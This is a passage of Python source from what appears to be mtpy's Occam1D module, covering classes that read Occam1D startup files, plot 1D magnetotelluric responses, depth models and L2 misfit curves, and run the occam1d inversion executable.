        attributes (e.g. 'Max Iter' --> self.max_iter) and are also stored in
        self.indict under their original names; the starting model values go
        into self.indict['res'] column 0.

        Arguments:
        ----------
            **startup_fn** : full path to startup file; defaults to
                             self.startup_fn

        :Example: ::

            >>> s1 = occam1d.Startup()
            >>> s1.read_startup_file(r"/home/Occam1D/Inv1_TE/OccamStartup1D")
        """
        if startup_fn is not None:
            self.startup_fn = startup_fn
        if self.startup_fn is None:
            raise IOError('Need to input a startup file.')

        self._startup_fn = os.path.basename(self.startup_fn)
        self.save_path = os.path.dirname(self.startup_fn)

        infid = open(self.startup_fn, 'r')
        ilines = infid.readlines()
        infid.close()

        self.indict = {}
        res = []

        # split the keys and values from the header information
        for iline in ilines:
            if iline.find(':') >= 0:
                # strip the trailing ':' from the key
                ikey = iline[0:20].strip()[:-1]
                ivalue = iline[20:].split('!')[0].strip()
                if ikey.find('!') == 0:
                    # commented-out header line, skip
                    pass
                else:
                    setattr(self, ikey.lower().replace(' ', '_'), ivalue)
                    # bug fix: ikey already had the ':' removed above; the
                    # original stored ikey[:-1], chopping the last letter of
                    # every key ('Forma' instead of 'Format')
                    self.indict[ikey] = ivalue
            else:
                try:
                    res.append(float(iline.strip()))
                except ValueError:
                    pass

        # make the resistivity array ready for models to be input
        self.indict['res'] = np.zeros((len(res), 3))
        self.indict['res'][:, 0] = res
class Plot1DResponse(object):
    """
    plot the 1D response and model. Plots apparent resisitivity and phase
    in different subplots with the model on the far right. You can plot both
    TE and TM modes together along with different iterations of the model.
    These will be plotted in different colors or shades of gray depending on
    color_mode.

    :Example: ::

        >>> import mtpy.modeling.occam1d as occam1d
        >>> p1 = occam1d.Plot1DResponse(plot_yn='n')
        >>> p1.data_te_fn = r"/home/occam1d/mt01/TE/Occam_DataFile_TE.dat"
        >>> p1.data_tm_fn = r"/home/occam1d/mt01/TM/Occam_DataFile_TM.dat"
        >>> p1.model_fn = r"/home/occam1d/mt01/TE/Model1D"
        >>> p1.iter_te_fn = [r"/home/occam1d/mt01/TE/TE_{0}.iter".format(ii)
        >>> ...              for ii in range(5,10)]
        >>> p1.iter_tm_fn = [r"/home/occam1d/mt01/TM/TM_{0}.iter".format(ii)
        >>> ...              for ii in range(5,10)]
        >>> p1.resp_te_fn = [r"/home/occam1d/mt01/TE/TE_{0}.resp".format(ii)
        >>> ...              for ii in range(5,10)]
        >>> p1.resp_tm_fn = [r"/home/occam1d/mt01/TM/TM_{0}.resp".format(ii)
        >>> ...              for ii in range(5,10)]
        >>> p1.plot()

    ==================== ======================================================
    Attributes           Description
    ==================== ======================================================
    axm                  matplotlib.axes instance for model subplot
    axp                  matplotlib.axes instance for phase subplot
    axr                  matplotlib.axes instance for app. res subplot
    color_mode           [ 'color' | 'bw' ]
    cted                 color of TE data markers
    ctem                 color of TE model markers
    ctmd                 color of TM data markers
    ctmm                 color of TM model markers
    data_te_fn           full path to data file for TE mode
    data_tm_fn           full path to data file for TM mode
    depth_limits         (min, max) limits for depth plot in depth_units
    depth_scale          [ 'log' | 'linear' ] *default* is linear
    depth_units          [ 'm' | 'km' ] *default is 'km'
    e_capsize            capsize of error bars
    e_capthick           cap thickness of error bars
    fig                  matplotlib.figure instance for plot
    fig_dpi              resolution in dots-per-inch for figure
    fig_num              number of figure instance
    fig_size             size of figure in inches [width, height]
    font_size            size of axes tick labels, axes labels are +2
    grid_alpha           transparency of grid
    grid_color           color of grid
    iter_te_fn           full path or list of .iter files for TE mode
    iter_tm_fn           full path or list of .iter files for TM mode
    lw                   width of lines for model
    model_fn             full path to model file
    ms                   marker size
    mted                 marker for TE data
    mtem                 marker for TE model
    mtmd                 marker for TM data
    mtmm                 marker for TM model
    phase_limits         (min, max) limits on phase in degrees
    phase_major_ticks    spacing for major ticks in phase
    phase_minor_ticks    spacing for minor ticks in phase
    plot_yn              [ 'y' | 'n' ] plot on instantiation
    res_limits           limits of resistivity in linear scale
    resp_te_fn           full path or list of .resp files for TE mode
    resp_tm_fn           full path or list of .iter files for TM mode
    subplot_bottom       spacing of subplots from bottom of figure
    subplot_hspace       height spacing between subplots
    subplot_left         spacing of subplots from left of figure
    subplot_right        spacing of subplots from right of figure
    subplot_top          spacing of subplots from top of figure
    subplot_wspace       width spacing between subplots
    title_str            title of plot
    ==================== ======================================================
    """

    def __init__(self, data_te_fn=None, data_tm_fn=None, model_fn=None,
                 resp_te_fn=None, resp_tm_fn=None, iter_te_fn=None,
                 iter_tm_fn=None, **kwargs):
        self.data_te_fn = data_te_fn
        self.data_tm_fn = data_tm_fn

        self.model_fn = model_fn

        # normalize the response/iteration file names to lists so several
        # iterations can be plotted together
        self.resp_te_fn = resp_te_fn
        if type(self.resp_te_fn) is not list:
            self.resp_te_fn = [self.resp_te_fn]

        self.resp_tm_fn = resp_tm_fn
        if type(self.resp_tm_fn) is not list:
            self.resp_tm_fn = [self.resp_tm_fn]

        self.iter_te_fn = iter_te_fn
        if type(self.iter_te_fn) is not list:
            self.iter_te_fn = [self.iter_te_fn]

        self.iter_tm_fn = iter_tm_fn
        if type(self.iter_tm_fn) is not list:
            self.iter_tm_fn = [self.iter_tm_fn]

        self.color_mode = kwargs.pop('color_mode', 'color')

        self.ms = kwargs.pop('ms', 1.5)
        self.lw = kwargs.pop('lw', .5)
        self.ls = kwargs.pop('ls', ':')
        self.e_capthick = kwargs.pop('e_capthick', .5)
        self.e_capsize = kwargs.pop('e_capsize', 2)

        self.phase_major_ticks = kwargs.pop('phase_major_ticks', 10)
        self.phase_minor_ticks = kwargs.pop('phase_minor_ticks', 5)

        self.grid_color = kwargs.pop('grid_color', (.25, .25, .25))
        self.grid_alpha = kwargs.pop('grid_alpha', .3)

        # color mode
        if self.color_mode == 'color':
            # color for data
            self.cted = kwargs.pop('cted', (0, 0, 1))
            self.ctmd = kwargs.pop('ctmd', (1, 0, 0))
            self.mted = kwargs.pop('mted', 's')
            self.mtmd = kwargs.pop('mtmd', 'o')

            # color for occam2d model
            self.ctem = kwargs.pop('ctem', (0, .6, .3))
            self.ctmm = kwargs.pop('ctmm', (.9, 0, .8))
            self.mtem = kwargs.pop('mtem', '+')
            self.mtmm = kwargs.pop('mtmm', '+')

        # black and white mode
        elif self.color_mode == 'bw':
            # color for data
            self.cted = kwargs.pop('cted', (0, 0, 0))
            self.ctmd = kwargs.pop('ctmd', (0, 0, 0))
            self.mted = kwargs.pop('mted', '*')
            self.mtmd = kwargs.pop('mtmd', 'v')

            # color for occam2d model
            self.ctem = kwargs.pop('ctem', (0.6, 0.6, 0.6))
            self.ctmm = kwargs.pop('ctmm', (0.6, 0.6, 0.6))
            self.mtem = kwargs.pop('mtem', '+')
            self.mtmm = kwargs.pop('mtmm', 'x')

        self.phase_limits = kwargs.pop('phase_limits', (-5, 95))
        self.res_limits = kwargs.pop('res_limits', None)
        self.depth_limits = kwargs.pop('depth_limits', None)
        self.depth_scale = kwargs.pop('depth_scale', 'linear')
        self.depth_units = kwargs.pop('depth_units', 'km')

        self.fig_num = kwargs.pop('fig_num', 1)
        self.fig_size = kwargs.pop('fig_size', [6, 6])
        # consistency fix: accept 'fig_dpi' (matching the attribute name) as
        # well as the legacy 'dpi' keyword
        self.fig_dpi = kwargs.pop('fig_dpi', kwargs.pop('dpi', 300))
        self.fig = None
        self.axr = None
        self.axp = None
        self.axm = None

        self.subplot_wspace = .25
        self.subplot_hspace = .15
        self.subplot_right = .92
        self.subplot_left = .085
        self.subplot_top = .93
        self.subplot_bottom = .1

        self.font_size = kwargs.pop('font_size', 6)

        self.title_str = kwargs.pop('title_str', '')
        self.plot_yn = kwargs.pop('plot_yn', 'y')

        if self.plot_yn == 'y':
            self.plot()

    def plot(self):
        """
        Plot data, model responses and the depth model.  Observed data are
        plotted first, then each response/iteration file in its own shade.
        """
        # the attributes may have been reassigned after __init__, so make
        # sure the file name inputs are still lists
        if type(self.resp_te_fn) is not list:
            self.resp_te_fn = [self.resp_te_fn]
        if type(self.resp_tm_fn) is not list:
            self.resp_tm_fn = [self.resp_tm_fn]
        if type(self.iter_te_fn) is not list:
            self.iter_te_fn = [self.iter_te_fn]
        if type(self.iter_tm_fn) is not list:
            self.iter_tm_fn = [self.iter_tm_fn]

        # make a grid of subplots
        gs = gridspec.GridSpec(6, 5, hspace=self.subplot_hspace,
                               wspace=self.subplot_wspace)
        # make a figure
        self.fig = plt.figure(self.fig_num, self.fig_size, dpi=self.fig_dpi)
        plt.clf()

        # set some plot parameters
        plt.rcParams['font.size'] = self.font_size
        plt.rcParams['figure.subplot.left'] = self.subplot_left
        plt.rcParams['figure.subplot.right'] = self.subplot_right
        plt.rcParams['figure.subplot.bottom'] = self.subplot_bottom
        plt.rcParams['figure.subplot.top'] = self.subplot_top

        # subplot resistivity
        self.axr = self.fig.add_subplot(gs[:4, :4])
        # subplot for phase
        self.axp = self.fig.add_subplot(gs[4:, :4], sharex=self.axr)
        # subplot for model
        self.axm = self.fig.add_subplot(gs[:, 4])

        legend_marker_list_te = []
        legend_label_list_te = []
        legend_marker_list_tm = []
        legend_label_list_tm = []

        # --> plot data apparent resistivity and phase-------------------------
        if self.data_te_fn is not None:
            d1 = Data()
            d1.read_data_file(self.data_te_fn)

            # --> cut out missing data
            rxy = np.where(d1.res_te[0] != 0)[0]

            # --> TE mode Data
            if len(rxy) > 0:
                rte = self.axr.errorbar(1. / d1.freq[rxy],
                                        d1.res_te[0][rxy],
                                        ls=self.ls,
                                        marker=self.mted,
                                        ms=self.ms,
                                        mfc=self.cted,
                                        mec=self.cted,
                                        color=self.cted,
                                        yerr=d1.res_te[1][rxy],
                                        ecolor=self.cted,
                                        picker=2,
                                        lw=self.lw,
                                        elinewidth=self.lw,
                                        capsize=self.e_capsize,
                                        capthick=self.e_capthick)
                legend_marker_list_te.append(rte[0])
                legend_label_list_te.append('$Obs_{TE}$')
            else:
                pass

            # --------------------plot phase--------------------------------
            # cut out missing data points first
            pxy = np.where(d1.phase_te[0] != 0)[0]

            # --> TE mode data
            if len(pxy) > 0:
                self.axp.errorbar(1. / d1.freq[pxy],
                                  d1.phase_te[0][pxy],
                                  ls=self.ls,
                                  marker=self.mted,
                                  ms=self.ms,
                                  mfc=self.cted,
                                  mec=self.cted,
                                  color=self.cted,
                                  yerr=d1.phase_te[1][pxy],
                                  ecolor=self.cted,
                                  picker=1,
                                  lw=self.lw,
                                  elinewidth=self.lw,
                                  capsize=self.e_capsize,
                                  capthick=self.e_capthick)
            else:
                pass

        # --> plot tm data------------------------------------------------------
        if self.data_tm_fn is not None:
            d1 = Data()
            d1.read_data_file(self.data_tm_fn)

            ryx = np.where(d1.res_tm[0] != 0)[0]

            # --> TM mode data
            if len(ryx) > 0:
                rtm = self.axr.errorbar(1. / d1.freq[ryx],
                                        d1.res_tm[0][ryx],
                                        ls=self.ls,
                                        marker=self.mtmd,
                                        ms=self.ms,
                                        mfc=self.ctmd,
                                        mec=self.ctmd,
                                        color=self.ctmd,
                                        yerr=d1.res_tm[1][ryx],
                                        ecolor=self.ctmd,
                                        picker=2,
                                        lw=self.lw,
                                        elinewidth=self.lw,
                                        capsize=self.e_capsize,
                                        capthick=self.e_capthick)
                legend_marker_list_tm.append(rtm[0])
                legend_label_list_tm.append('$Obs_{TM}$')
            else:
                pass

            # --------------------plot phase--------------------------------
            # cut out missing data points first
            pyx = np.where(d1.phase_tm[0] != 0)[0]

            # --> TM mode data
            if len(pyx) > 0:
                self.axp.errorbar(1. / d1.freq[pyx],
                                  d1.phase_tm[0][pyx],
                                  ls=self.ls,
                                  marker=self.mtmd,
                                  ms=self.ms,
                                  mfc=self.ctmd,
                                  mec=self.ctmd,
                                  color=self.ctmd,
                                  yerr=d1.phase_tm[1][pyx],
                                  ecolor=self.ctmd,
                                  picker=1,
                                  lw=self.lw,
                                  elinewidth=self.lw,
                                  capsize=self.e_capsize,
                                  capthick=self.e_capthick)
            else:
                pass

        # --> plot model apparent resistivity and phase-------------------------
        nr = len(self.resp_te_fn)
        for rr, rfn in enumerate(self.resp_te_fn):
            if rfn is None:
                break
            # the iteration number is assumed to be the two characters before
            # the file extension, e.g. TE_07.resp --> '07'
            itnum = rfn[-7:-5]
            if self.color_mode == 'color':
                cxy = (0, .4 + float(rr) / (3 * nr), 0)
            elif self.color_mode == 'bw':
                cxy = (1 - 1.25 / (rr + 2.), 1 - 1.25 / (rr + 2.),
                       1 - 1.25 / (rr + 2.))
            d1 = Data()
            d1.read_resp_file(rfn, data_fn=self.data_te_fn)

            # get non zero data (row 2/3 hold the model response/error)
            rxy = np.where(d1.res_te[2] != 0)[0]

            # --> TE mode Data
            if len(rxy) > 0:
                rte = self.axr.errorbar(1. / d1.freq[rxy],
                                        d1.res_te[2][rxy],
                                        ls=self.ls,
                                        marker=self.mtem,
                                        ms=self.ms,
                                        mfc=cxy,
                                        mec=cxy,
                                        color=cxy,
                                        yerr=d1.res_te[3][rxy],
                                        ecolor=cxy,
                                        picker=2,
                                        lw=self.lw,
                                        elinewidth=self.lw,
                                        capsize=self.e_capsize,
                                        capthick=self.e_capthick)
                legend_marker_list_te.append(rte[0])
                legend_label_list_te.append('$Mod_{TE}$' + itnum)
            else:
                pass

            # --------------------plot phase--------------------------------
            # cut out missing data points first
            pxy = np.where(d1.phase_te[2] != 0)[0]

            # --> TE mode phase
            if len(pxy) > 0:
                self.axp.errorbar(1. / d1.freq[pxy],
                                  d1.phase_te[2][pxy],
                                  ls=self.ls,
                                  marker=self.mtem,
                                  ms=self.ms,
                                  mfc=cxy,
                                  mec=cxy,
                                  color=cxy,
                                  yerr=d1.phase_te[3][pxy],
                                  ecolor=cxy,
                                  picker=1,
                                  lw=self.lw,
                                  elinewidth=self.lw,
                                  capsize=self.e_capsize,
                                  capthick=self.e_capthick)
            else:
                pass

        # ---------------plot TM model response---------------------------------
        nr = len(self.resp_tm_fn)
        for rr, rfn in enumerate(self.resp_tm_fn):
            if rfn is None:
                break
            itnum = rfn[-7:-5]
            if self.color_mode == 'color':
                cyx = (.7 + float(rr) / (4 * nr), .13,
                       .63 - float(rr) / (4 * nr))
            elif self.color_mode == 'bw':
                cyx = (1 - 1.25 / (rr + 2.), 1 - 1.25 / (rr + 2.),
                       1 - 1.25 / (rr + 2.))
            d1 = Data()
            d1.read_resp_file(rfn, data_fn=self.data_tm_fn)

            ryx = np.where(d1.res_tm[2] != 0)[0]

            # --> TM mode model
            if len(ryx) > 0:
                rtm = self.axr.errorbar(1. / d1.freq[ryx],
                                        d1.res_tm[2][ryx],
                                        ls=self.ls,
                                        marker=self.mtmm,
                                        ms=self.ms,
                                        mfc=cyx,
                                        mec=cyx,
                                        color=cyx,
                                        yerr=d1.res_tm[3][ryx],
                                        ecolor=cyx,
                                        picker=2,
                                        lw=self.lw,
                                        elinewidth=self.lw,
                                        capsize=self.e_capsize,
                                        capthick=self.e_capthick)
                legend_marker_list_tm.append(rtm[0])
                legend_label_list_tm.append('$Mod_{TM}$' + itnum)
            else:
                pass

            pyx = np.where(d1.phase_tm[2] != 0)[0]

            # --> TM mode model
            if len(pyx) > 0:
                # bug fix: the original plotted d1.phase_tm[0] (the observed
                # data) here, with indices taken from the model-response mask;
                # row 2 is the model response, matching the TE branch above
                self.axp.errorbar(1. / d1.freq[pyx],
                                  d1.phase_tm[2][pyx],
                                  ls=self.ls,
                                  marker=self.mtmm,
                                  ms=self.ms,
                                  mfc=cyx,
                                  mec=cyx,
                                  color=cyx,
                                  yerr=d1.phase_tm[3][pyx],
                                  ecolor=cyx,
                                  picker=1,
                                  lw=self.lw,
                                  elinewidth=self.lw,
                                  capsize=self.e_capsize,
                                  capthick=self.e_capthick)
            else:
                pass

        # --> set axis properties-----------------------------------------------
        self.axr.set_xscale('log')
        self.axp.set_xscale('log')
        self.axr.set_yscale('log')
        self.axr.grid(True, alpha=self.grid_alpha, which='both',
                      color=self.grid_color)
        plt.setp(self.axr.xaxis.get_ticklabels(), visible=False)
        self.axp.grid(True, alpha=self.grid_alpha, which='both',
                      color=self.grid_color)
        self.axp.yaxis.set_major_locator(MultipleLocator(self.phase_major_ticks))
        self.axp.yaxis.set_minor_locator(MultipleLocator(self.phase_minor_ticks))

        if self.res_limits is not None:
            self.axr.set_ylim(self.res_limits)

        self.axp.set_ylim(self.phase_limits)
        self.axr.set_ylabel('App. Res. ($\Omega \cdot m$)',
                            fontdict={'size': self.font_size, 'weight': 'bold'})
        self.axp.set_ylabel('Phase (deg)',
                            fontdict={'size': self.font_size, 'weight': 'bold'})
        self.axp.set_xlabel('Period (s)',
                            fontdict={'size': self.font_size, 'weight': 'bold'})
        plt.suptitle(self.title_str, fontsize=self.font_size + 2,
                     fontweight='bold')

        # use two legend columns only when both modes are present
        if legend_marker_list_te == [] or legend_marker_list_tm == []:
            num_col = 1
        else:
            num_col = 2

        self.axr.legend(legend_marker_list_te + legend_marker_list_tm,
                        legend_label_list_te + legend_label_list_tm,
                        loc=2, markerscale=1,
                        borderaxespad=.05,
                        labelspacing=.08,
                        handletextpad=.15,
                        borderpad=.05,
                        ncol=num_col,
                        prop={'size': self.font_size + 1})

        # --> plot depth model--------------------------------------------------
        if self.model_fn is not None:
            # put axis labels on the right side for clarity
            self.axm.yaxis.set_label_position('right')
            self.axm.yaxis.set_tick_params(left='off', right='on',
                                           labelright='on')
            self.axm.yaxis.tick_right()

            if self.depth_units == 'km':
                dscale = 1000.
            else:
                dscale = 1.

            # --> plot te models
            nr = len(self.iter_te_fn)
            for ii, ifn in enumerate(self.iter_te_fn):
                if ifn is None:
                    break
                if self.color_mode == 'color':
                    cxy = (0, .4 + float(ii) / (3 * nr), 0)
                elif self.color_mode == 'bw':
                    cxy = (1 - 1.25 / (ii + 2.), 1 - 1.25 / (ii + 2.),
                           1 - 1.25 / (ii + 2.))
                m1 = Model()
                m1.read_iter_file(ifn, self.model_fn)
                # skip the air layer; model resistivities are log10 values
                plot_depth = m1.model_depth[1:] / dscale
                plot_model = abs(10 ** m1.model_res[1:, 1])
                self.axm.semilogx(plot_model[::-1],
                                  plot_depth[::-1],
                                  ls='steps-',
                                  color=cxy,
                                  lw=self.lw)

            # --> plot TM models
            nr = len(self.iter_tm_fn)
            for ii, ifn in enumerate(self.iter_tm_fn):
                if ifn is None:
                    break
                if self.color_mode == 'color':
                    cyx = (.7 + float(ii) / (4 * nr), .13,
                           .63 - float(ii) / (4 * nr))
                elif self.color_mode == 'bw':
                    cyx = (1 - 1.25 / (ii + 2.), 1 - 1.25 / (ii + 2.),
                           1 - 1.25 / (ii + 2.))
                m1 = Model()
                m1.read_iter_file(ifn, self.model_fn)
                plot_depth = m1.model_depth[1:] / dscale
                plot_model = abs(10 ** m1.model_res[1:, 1])
                self.axm.semilogx(plot_model[::-1],
                                  plot_depth[::-1],
                                  ls='steps-',
                                  color=cyx,
                                  lw=self.lw)

            m1 = Model()
            m1.read_model_file(self.model_fn)
            if self.depth_limits is None:
                # robustness fix: derive the default limits from the model
                # file depths instead of the loop variable plot_depth, which
                # is undefined when no iteration files were given
                plot_depth = m1.model_depth[1:] / dscale
                dmin = min(plot_depth)
                if dmin == 0:
                    dmin = 1
                dmax = max(plot_depth)
                self.depth_limits = (dmin, dmax)

            # depth increases downwards
            self.axm.set_ylim(ymin=max(self.depth_limits),
                              ymax=min(self.depth_limits))
            if self.depth_scale == 'log':
                self.axm.set_yscale('log')

            self.axm.set_ylabel('Depth ({0})'.format(self.depth_units),
                                fontdict={'size': self.font_size,
                                          'weight': 'bold'})
            self.axm.set_xlabel('Resistivity ($\Omega \cdot m$)',
                                fontdict={'size': self.font_size,
                                          'weight': 'bold'})
            self.axm.grid(True, which='both', alpha=.25)

        plt.show()

    def redraw_plot(self):
        """
        redraw plot if parameters were changed

        use this function if you updated some attributes and want to re-plot.

        :Example: ::

            >>> # change the color and marker of the xy components
            >>> import mtpy.modeling.occam2d as occam2d
            >>> ocd = occam2d.Occam2DData(r"/home/occam2d/Data.dat")
            >>> p1 = ocd.plotAllResponses()
            >>> #change line width
            >>> p1.lw = 2
            >>> p1.redraw_plot()
        """
        plt.close(self.fig)
        self.plot()

    def update_plot(self, fig):
        """
        update any parameters that where changed using the built-in draw from
        canvas.

        Use this if you change any of the .fig or axes properties

        :Example: ::

            >>> # to change the grid lines to only be on the major ticks
            >>> import mtpy.modeling.occam2d as occam2d
            >>> dfn = r"/home/occam2d/Inv1/data.dat"
            >>> ocd = occam2d.Occam2DData(dfn)
            >>> ps1 = ocd.plotAllResponses()
            >>> [ax.grid(True, which='major') for ax in [ps1.axrte,ps1.axtep]]
            >>> ps1.update_plot()
        """
        fig.canvas.draw()

    def save_figure(self, save_fn, file_format='pdf', orientation='portrait',
                    fig_dpi=None, close_plot='y'):
        """
        save_plot will save the figure to save_fn.

        Arguments:
        -----------
            **save_fn** : string
                          full path to save figure to, can be input as
                          * directory path -> the directory path to save to
                            in which the file will be saved as
                            save_fn/Occam1d.file_format
                          * full path -> file will be saved to the given
                            path.  If you use this option then the format
                            will be assumed to be provided by the path

            **file_format** : [ pdf | eps | jpg | png | svg ]
                              file type of saved figure pdf,svg,eps...

            **orientation** : [ landscape | portrait ]
                              orientation in which the file will be saved
                              *default* is portrait

            **fig_dpi** : int
                          The resolution in dots-per-inch the file will be
                          saved.  If None then the dpi will be that at
                          which the figure was made.

            **close_plot** : [ y | n ]
                             * 'y' will close the plot after saving.
                             * 'n' will leave plot open

        :Example: ::

            >>> # to save plot as jpg
            >>> import mtpy.modeling.occam2d as occam2d
            >>> dfn = r"/home/occam2d/Inv1/data.dat"
            >>> ocd = occam2d.Occam2DData(dfn)
            >>> ps1 = ocd.plotPseudoSection()
            >>> ps1.save_plot(r'/home/MT/figures', file_format='jpg')
        """
        if fig_dpi is None:
            fig_dpi = self.fig_dpi

        if not os.path.isdir(save_fn):
            # a full file path was given; take the format from the extension
            file_format = save_fn[-3:]
            self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
                             orientation=orientation, bbox_inches='tight')
        else:
            save_fn = os.path.join(save_fn, 'Occam1d.' +
                                   file_format)
            self.fig.savefig(save_fn, dpi=fig_dpi, format=file_format,
                             orientation=orientation, bbox_inches='tight')

        if close_plot == 'y':
            plt.clf()
            plt.close(self.fig)
        else:
            pass

        self.fig_fn = save_fn
        print('Saved figure to: ' + self.fig_fn)

    def __str__(self):
        """
        rewrite the string builtin to give a useful message
        """
        return ("Plots model responses and model for 1D occam inversion")
class Run(object):
    """
    Run Occam1D from python given the full path to a startup file and to the
    occam1d executable.

    Arguments:
    ----------
        **startup_fn** : full path to the startup file written by Startup
        **occam_path** : full path to the occam1d executable

    Keyword arguments:
    ------------------
        **mode**   : polarization mode passed to the executable,
                     *default* is 'TE'
        **run_yn** : [ 'y' | 'n' ] run the inversion on instantiation,
                     *default* is 'y' (matches the historical behavior)
    """

    def __init__(self, startup_fn=None, occam_path=None, **kwargs):
        self.startup_fn = startup_fn
        self.occam_path = occam_path
        self.mode = kwargs.pop('mode', 'TE')
        # run on instantiation unless explicitly disabled with run_yn='n'
        self.run_yn = kwargs.pop('run_yn', 'y')

        if self.run_yn == 'y':
            self.run_occam1d()

    def run_occam1d(self):
        """
        Change into the startup file directory and call the occam1d
        executable as a subprocess.

        Raises IOError if startup_fn or occam_path is not set.
        """
        if self.startup_fn is None:
            raise IOError('Need to input startup file')
        if self.occam_path is None:
            raise IOError('Need to input path to occam1d executable')

        # occam1d writes its output files into the current directory
        os.chdir(os.path.dirname(self.startup_fn))
        test = subprocess.call([self.occam_path,
                                os.path.basename(self.startup_fn),
                                self.mode])
        if test == 0:
            print('=========== Ran Inversion ==========')
            print(' check {0} for files'.format(
                os.path.dirname(self.startup_fn)))
class PlotL2():
    """
    plot L2 curve of iteration vs rms and roughness

    Arguments:
    ----------
        **rms_arr** : structured array with keys:
                      * 'iteration' --> for iteration number (int)
                      * 'rms' --> for rms (float)
                      * 'roughness' --> for roughness (float)

    ======================= ===================================================
    Keywords/attributes     Description
    ======================= ===================================================
    ax1                     matplotlib.axes instance for rms vs iteration
    ax2                     matplotlib.axes instance for roughness vs rms
    fig                     matplotlib.figure instance
    fig_dpi                 resolution of figure in dots-per-inch
    fig_num                 number of figure instance
    fig_size                size of figure in inches (width, height)
    font_size               size of axes tick labels, axes labels is +2
    plot_yn                 [ 'y' | 'n']
                            'y' --> to plot on instantiation
                            'n' --> to not plot on instantiation
    rms_arr                 structure np.array as described above
    rms_color               color of rms marker and line
    rms_lw                  line width of rms line
    rms_marker              marker for rms values
    rms_marker_size         size of marker for rms values
    rms_mean_color          color of mean line
    rms_median_color        color of median line
    rough_color             color of roughness line and marker
    rough_font_size         font size for iteration number inside roughness
                            marker
    rough_lw                line width for roughness line
    rough_marker            marker for roughness
    rough_marker_size       size of marker for roughness
    subplot_bottom          subplot spacing from bottom
    subplot_left            subplot spacing from left
    subplot_right           subplot spacing from right
    subplot_top             subplot spacing from top
    ======================= ===================================================

    =================== =======================================================
    Methods             Description
    =================== =======================================================
    plot                plots L2 curve.
    redraw_plot         call redraw_plot to redraw the figures,
                        if one of the attributes has been changed
    save_figure         saves the matplotlib.figure instance to desired
                        location and format
    =================== ======================================================
    """

    def __init__(self, dir_path, model_fn, **kwargs):
        # directory containing the occam1d *.iter files and the model file name
        self.dir_path = dir_path
        self.model_fn = model_fn
        # populate self.rms_arr from the iteration files on disk
        self._get_iter_list()
        self.subplot_right = .98
        self.subplot_left = .085
        self.subplot_top = .91
        self.subplot_bottom = .1
        self.fig_num = kwargs.pop('fig_num', 1)
        self.fig_size = kwargs.pop('fig_size', [6, 6])
        self.fig_dpi = kwargs.pop('dpi', 300)
        self.font_size = kwargs.pop('font_size', 8)
        self.rms_lw = kwargs.pop('rms_lw', 1)
        self.rms_marker = kwargs.pop('rms_marker', 'd')
        self.rms_color = kwargs.pop('rms_color', 'k')
        self.rms_marker_size = kwargs.pop('rms_marker_size', 5)
        self.rms_median_color = kwargs.pop('rms_median_color', 'red')
        self.rms_mean_color = kwargs.pop('rms_mean_color', 'orange')
        self.rough_lw = kwargs.pop('rough_lw', .75)
        self.rough_marker = kwargs.pop('rough_marker', 'o')
        self.rough_color = kwargs.pop('rough_color', 'b')
        self.rough_marker_size = kwargs.pop('rough_marker_size', 7)
        self.rough_font_size = kwargs.pop('rough_font_size', 6)
        self.plot_yn = kwargs.pop('plot_yn', 'y')
        if self.plot_yn == 'y':
            self.plot()

    def _get_iter_list(self):
        """
        get all iteration files in dir_path and collect their iteration
        number, misfit and roughness into the structured array self.rms_arr
        """
        if os.path.isdir(self.dir_path) == False:
            raise IOError('Could not find {0}'.format(self.dir_path))
        iter_list = [os.path.join(self.dir_path, fn)
                     for fn in os.listdir(self.dir_path)
                     if fn.find('.iter')>0]
        # NOTE(review): np.int / np.float are deprecated aliases in modern
        # numpy -- fine for the numpy versions this (Python 2) module targets.
        self.rms_arr = np.zeros(len(iter_list),
                                dtype=np.dtype([('iteration', np.int),
                                                ('rms', np.float),
                                                ('roughness', np.float)]))
        for ii, fn in enumerate(iter_list):
            m1 = Model()
            m1.read_iter_file(fn, self.model_fn)
            self.rms_arr[ii]['iteration'] = int(m1.itdict['Iteration'])
            self.rms_arr[ii]['rms'] = float(m1.itdict['Misfit Value'])
            self.rms_arr[ii]['roughness'] = float(m1.itdict['Roughness Value'])
        # sort so the L2 curve is drawn in iteration order
        self.rms_arr.sort(order='iteration')

    def plot(self):
        """
        plot L2 curve: RMS vs iteration on ax1, with RMS vs roughness
        overlaid on a twin axis (ax2); iteration numbers are written inside
        the roughness markers.
        """
        nr = self.rms_arr.shape[0]
        med_rms = np.median(self.rms_arr['rms'])
        mean_rms = np.mean(self.rms_arr['rms'])
        #set the dimesions of the figure
        plt.rcParams['font.size'] = self.font_size
        plt.rcParams['figure.subplot.left'] = self.subplot_left
        plt.rcParams['figure.subplot.right'] = self.subplot_right
        plt.rcParams['figure.subplot.bottom'] = self.subplot_bottom
        plt.rcParams['figure.subplot.top'] = self.subplot_top
        #make figure instance
        self.fig = plt.figure(self.fig_num,self.fig_size, dpi=self.fig_dpi)
        plt.clf()
        #make a subplot for RMS vs Iteration
        self.ax1 = self.fig.add_subplot(1, 1, 1)
        #plot the rms vs iteration
        l1, = self.ax1.plot(self.rms_arr['iteration'],
                            self.rms_arr['rms'],
                            '-k',
                            lw=1,
                            marker='d',
                            ms=5)
        #plot the median of the RMS
        m1, = self.ax1.plot(self.rms_arr['iteration'],
                            np.repeat(med_rms, nr),
                            ls='--',
                            color=self.rms_median_color,
                            lw=self.rms_lw*.75)
        #plot the mean of the RMS
        m2, = self.ax1.plot(self.rms_arr['iteration'],
                            np.repeat(mean_rms, nr),
                            ls='--',
                            color=self.rms_mean_color,
                            lw=self.rms_lw*.75)
        #make subplot for RMS vs Roughness Plot
        self.ax2 = self.ax1.twiny()
        # skip index 0: the starting model has no meaningful roughness/rms
        self.ax2.set_xlim(self.rms_arr['roughness'][1:].min(),
                          self.rms_arr['roughness'][1:].max())
        self.ax1.set_ylim(0, self.rms_arr['rms'][1])
        #plot the rms vs roughness
        l2, = self.ax2.plot(self.rms_arr['roughness'],
                            self.rms_arr['rms'],
                            ls='--',
                            color=self.rough_color,
                            lw=self.rough_lw,
                            marker=self.rough_marker,
                            ms=self.rough_marker_size,
                            mfc='white')
        #plot the iteration number inside the roughness marker
        for rms, ii, rough in zip(self.rms_arr['rms'], self.rms_arr['iteration'],
                                  self.rms_arr['roughness']):
            #need this because if the roughness is larger than this number
            #matplotlib puts the text out of bounds and a draw_text_image
            #error is raised and file cannot be saved, also the other
            #numbers are not put in.
            if rough > 1e8:
                pass
            else:
                self.ax2.text(rough,
                              rms,
                              '{0}'.format(ii),
                              horizontalalignment='center',
                              verticalalignment='center',
                              fontdict={'size':self.rough_font_size,
                                        'weight':'bold',
